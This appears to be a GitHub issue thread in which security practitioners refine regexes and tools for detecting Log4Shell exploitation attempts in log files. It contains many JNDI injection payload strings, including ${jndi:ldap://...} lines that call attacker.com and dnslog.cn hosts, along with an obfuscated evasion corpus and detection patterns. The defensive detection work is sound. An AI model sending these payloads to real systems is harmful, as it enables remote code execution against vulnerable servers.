Open back2root opened 2 years ago
That's really nice. Let me see if I can verify the regex and add it to the gist in which we use grep.
https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
I can't make it match on my log files with
sudo egrep -I -i -r '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])' /var/log
Maybe egrep is somehow limited - missing back referencing e.g.
Log line in one of the test files
2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
Not yet testen on egrep/cli in general. As it should be valid pcre, maybe a perl oneliner can bring us results. Maybe I can craft sth. later.
Sorry, I'm working on 5-7 other construction sites (YARA, Sigma, Python script, advisory for customers). Thanks for your help.
Agreed that this is doable with a regex, but that’s also going to miss payloads (e.g. ${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}
¹, ${jnd${upper:ı}:rm${upper:ı}://addr}
). You probably just want something like https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6
¹ EDIT: Turns out the former won't work by default because base64
isn't actually in a release yet, just in master, but...imagine that someone added it as a custom lookup, or just consider any of the other available lookups.
Hi
I just now managed to test the regex on the CLI.
The RegEx seem to work with grep -P
against the test cases from this repo.
Current limitations:
➜ test-cases git:(main) ls | grep -E "log$"
test-java-exception.log
test-log-heavy-obfusc.log
test-log-log4shell-casing.log
test-log-log4shell-obf1.log
test-log-log4shell.log
test-shouldnt-match1.log
test-shouldnt-match2.log
test-url-encoded.log
test-urldecode-shouldnt-match.log
➜ test-cases git:(main) grep -V | head -n 1
grep (GNU grep) 3.4
➜ test-cases git:(main) grep -r -P '(?:\$|%24)(?:{|%7[Bb]).{0,30}(?:j|J|%[64][Aa]).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:d|D|%[64]4).{0,30}(?:i|I|%[64]9).{0,30}(?::|%3[Aa]).{0,30}(?:(?:l|L||%[64][Cc]).{0,30}(?:d|D|%[64]4).{0,30}(?:a|A|%[64]1).{0,30}(?:p|P|%[75]0)(?:.{0,30}(?:s|S|%[72]3))?|(?:r|R|%[72]2).{0,30}(?:m|M|%[64][Dd]).{0,30}(?:i|I|%[64]9)|(?:d|D|%[64]4).{0,30}(?:n|N|%[64][Ee]).{0,30}(?:s|S|%[72]3)).{0,30}(?::|%3[Aa])'
test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
Maybe I manage to work on a version containing the missing protocols: nis|iiop|corba|nds|http If there's interest, I'm happy to share.
Yes, please. We can replace the regex in this advisory with your version if it is able to cover the old strings and their obfuscated version. https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b
I wouldn't replace it as long as it can't detect the other protocols.
Since the RegEx has become a bit more complicated, I created a script that generates the RegEx and put it in its own repo log4shell-rex to make it easier to extend later.
Feel free to take it for or refference it in your gist.
➜ log4shell-rex git:(main) eval "$(./RegEx_Generator.sh)"
_ _ _ ____ _ _ _ ____
| | ___ __ _| || |/ ___|| |__ ___| | | | _ \ _____ __
| | / _ \ / _` | || |\___ \| '_ \ / _ \ | |_____| |_) / _ \ \/ /
| |__| (_) | (_| |__ _|__) | | | | __/ | |_____| _ < __/> <
|_____\___/ \__, | |_||____/|_| |_|\___|_|_| |_| \_\___/_/\_\
|___/
➜ log4shell-rex git:(main) grep -P ${Log4ShellRex} ../log4shell-detector/tests/test-cases/*.log
../log4shell-detector/tests/test-cases/test-log-heavy-obfusc.log:2021-12-11 [MyApp] - Contains ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
../log4shell-detector/tests/test-cases/test-log-log4shell-casing.log:2021-12-11 [MyApp] - Contains ${jNdI:ldAp://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-log-log4shell-obf1.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://spfcbf${lower:.}dnslog${lower:.}cn}
../log4shell-detector/tests/test-cases/test-log-log4shell.log:2021-12-11 [MyApp] - Contains ${jndi:ldap://tj5udg.dnslog.cn}
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains $%7Bjndi:ldap://tj5udg.dnslog.cn%7D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %24%257Bjndi%3Aldap%3A%2F%2Ftj5udg%2Ednslog%2Ecn%257D
../log4shell-detector/tests/test-cases/test-url-encoded.log:2021-12-11 [MyApp] - Contains %2524%25257Bjndi%253Aldap%253A%252F%252Ftj5udg%252Ednslog%252Ecn%25257D
You might want to try against this synthetic corpus, which is also trying to model what sort of attacks might be coming (or that are already being missed):
\044%7B\\44{env:NOTHING:-j}\u0024{lower:N}\\u0024{lower:${upper:d}}}i:addr}
%24%7Bjnd%24%7Bupper%3A%C4%B1%7D%3Aaddr%7D
${ jndi\t: addr\n
${ jndi\t: addr\n}
${${::-j}nd${upper:ı}:rm${upper:ı}://addr}
${${base64:JHtqbmRpOmxkYXA6YWRkcn0=}}
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//addr}
${base64:d2hvIHRob3VnaHQgYW55IG9mIHRoaXMgd2FzIGEgZ29vZCBpZGVhPwo=}
${jndi:${lower:l}${lower:d}a${lower:p}://$a{upper:d}dr}
${jndi:${lower:l}${lower:d}a${lower:p}://addr
${jndi:dns://addr}
$%7B\u006a\\156di:addr\\x7d
You can see how my detections fare, and run your own examples against the test(string)
and test_thorough(string)
functions.
I don’t think there’s going to be one regex to rule them all because there’s a signal to noise trade off that needs to be considered. You’d ideally match on all of them and build a confidence score naïve Bayes style. But you want to encode as few assumptions into your detections as possible, otherwise you literally won’t know what you’re missing.
@karanlyons wondering if exploit is possible without any protocol given and without forward slash: e.g. ${ jndi\t: addr\n}
Not yet sure about false positive rate
https://logging.apache.org/log4j/2.x/manual/lookups.html#JndiLookup:
The
JndiLookup
allows variables to be retrieved via JNDI. By default the key will be prefixed withjava:comp/env/
, however if the key contains a":"
no prefix will be added. By default the JDNI Lookup only supports thejava
,ldap
, andldaps
protocols or no protocol. Additional protocols may be supported by specifying them on thelog4j2.allowedJndiProtocols
property.
https://docs.oracle.com/javase/jndi/tutorial/beyond/misc/policy.html:
In the
comp
context, there are two bindings:env
andUserTransaction
. The nameenv
is bound to a subtree that is reserved for the component's environment-related bindings, as defined by its deployment descriptor.env
is short for environment.
Environment entries are a name-to-value binding that allows a component to externalize a value and refer to the value using a name.
So a contrived example would be, e.g., that there’s comp/env/pwd = "/"
and you then use ${jndi:ldap${jndi:pwd}${jndi:pwd}addr}
as your vector. I do not know whether this is practical anywhere or not, so I’d much rather have my detections tell me if someone else knows it’s practical rather than assume it isn’t and get popped.
Also keep in mind that jndi
is not the only lookup, and you can plausibly make use of others to construct payloads depending on what is available on the target, including any custom lookups the target may have. There’s even a base64
lookup referenced in the User’s Guide and though I’m not sure I’ve seen it working in the wild¹ it would handily break most detections I’ve seen.
Have you tried testing the detections I’ve linked above? You can get an idea of their sensitivities by throwing a corpus of known vectors and a corpus of theorized probably vectors at it. The usage.md file shows some example vectors and which detections they trigger. I’d really recommend just using them, and weighting your prioritization for any hits based on the confusion matrix you’re seeing for them with the data in your environment.
But your best plan of action is just to upgrade or mitigate (rm JndiLookup.class
or log4j2.formatMsgNoLookups=true
) your log4j dependencies, and practice good defense in depth (e.g., block all unknown egress—including DNS if you can handle running your own resolver safely, jail everything on your machine). No detections on remote inputs are going to be able to find every attempt, it’s a cat&mouse game stacked heavily in the attacker’s favor.
¹ EDIT: Again, because base64
isn't actually in a release yet, just in master, but—also again—imagine that someone added it as a custom lookup, or just consider any of the other available lookups.
THX @karanlyons I did some improvements on my RegEx and already get quite good coverage. Maybe still not enough to be used in IPS but good starting point for SIEM detections.
I’d still recommend that people use the collection of regexes I’ve put together as they’re free of assumptions. For example:
>>> from log4shell_regexes import *
>>> t = lambda s: [k for k in test(s)]
>>> BACK2ROOT_RE = re.compile(r'[elided for comment]')
>>> BACK2ROOT_RE.search('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}') or False
False
>>> t('${env:ZILCH:-jnd${lower:${upper:ı}}://addr}')
['NESTED_RE', 'NESTED_INCLUDING_ESCAPES_RE', 'ANY_RE', 'ANY_INCLUDING_ESCAPES_RE', 'NESTED_OPT_RCURLY_RE', 'NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE', 'ANY_OPT_RCURLY_RE', 'ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE']
If you’re having trouble just getting the regexes for use elsewhere, this is very easy to do:
>>> from log4shell_regexes import regexes
>>> for n, r in regexes.items(): print (f'{n}: {r.pattern}')
SIMPLE_RE: \$\{\s*jndi\s*:.*\}
SIMPLE_WITH_ESCAPED_CONTENT_RE: \$\{.*(?:\\|%).*\}
NESTED_RE: \$\{.*\$\{.*\}.*\}
NESTED_INCLUDING_ESCAPES_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)
ANY_RE: \$\{.*\}
ANY_INCLUDING_ESCAPES_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)
SIMPLE_OPT_RCURLY_RE: \$\{\s*jndi\s*:.*\}?
SIMPLE_WITH_ESCAPED_CONTENT_OPT_RCURLY_RE: \$\{.*(?:\\|%).*\}?
NESTED_OPT_RCURLY_RE: \$\{.*\$\{.*\}.*\}?
NESTED_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:(?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*){2}(?:\}|\\u007D|\\x7D|\\175|%7D).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
ANY_OPT_RCURLY_RE: \$\{.*\}?
ANY_INCLUDING_ESCAPES_OPT_RCURLY_RE: (?:\$|\\u0024||\\x24|\\0?44|%24)(?:\{|\\u007B|\\x7B|\\173|%7B).*(?:\}|\\u007D|\\x7D|\\175|%7D)?
Updated my regex
The following RegEx is just the equivalent. Don't know, if it's not a reasonable regular expression anymore, but it's doable:
It matches the following strings, even if they are (partially) URL-encoded and case-insensitive:
Example:
Improvement Idea for the Script: To reduce false positive chance and improve performance a bit, you could maybe force, that the '$' sign in the start is immediately followed by a '{'.